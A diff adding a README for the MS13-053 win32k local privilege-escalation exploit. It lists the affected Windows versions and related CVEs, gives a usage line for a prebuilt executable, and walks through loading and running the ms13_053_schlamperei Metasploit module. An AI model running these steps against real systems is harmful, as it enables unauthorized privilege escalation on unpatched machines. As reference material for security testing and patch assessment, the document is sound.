|
| 1 | +# MS13-053 |
| 2 | +``` |
| 3 | +win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, |
| 4 | +Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 does not properly handle objects in memory, |
| 5 | +which allows local users to gain privileges via a crafted application, aka "Win32k Information Disclosure Vulnerability." |
| 6 | +``` |
| 7 | + |
| 8 | +Vulnerability reference: |
| 9 | + * [MS13-053](https://technet.microsoft.com/library/security/ms13-053) |
| 10 | + * [CVE-2013-1300](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1300) |
| 11 | + * [CVE-2013-1340](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1340) |
| 12 | + * [CVE-2013-1345](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1345) |
| 13 | + * [CVE-2013-3129](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3129) |
| 14 | + * [CVE-2013-3167](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3167) |
| 15 | + * [CVE-2013-3172](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3172) |
| 16 | + * [CVE-2013-3173](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3173) |
| 17 | + * [CVE-2013-3660](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3660) |
| 18 | + |
| 19 | +## Usage |
| 20 | +``` |
| 21 | +c:\> MS13-053.exe |
| 22 | +``` |
| 23 | + |
| 24 | + |
| 25 | +## load the module within the Metasploit |
| 26 | +[msf](https://www.rapid7.com/db/modules/exploit/windows/local/ms13_053_schlamperei) |
| 27 | +``` |
| 28 | +msf > use exploit/windows/local/ms13_053_schlamperei |
| 29 | +msf exploit(ms13_053_schlamperei) > show targets |
| 30 | + ...targets... |
| 31 | +msf exploit(ms13_053_schlamperei) > set TARGET <target-id> |
| 32 | +msf exploit(ms13_053_schlamperei) > show options |
| 33 | + ...show and set options... |
| 34 | +msf exploit(ms13_053_schlamperei) > exploit |
| 35 | +``` |
| 36 | + |
| 37 | +## References |
| 38 | +* [Adobe, Microsoft Release Critical Updates](https://krebsonsecurity.com/tag/ms13-053/) |
| 39 | +* [ms13_053_schlamperei.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms13_053_schlamperei.rb) |
0 commit comments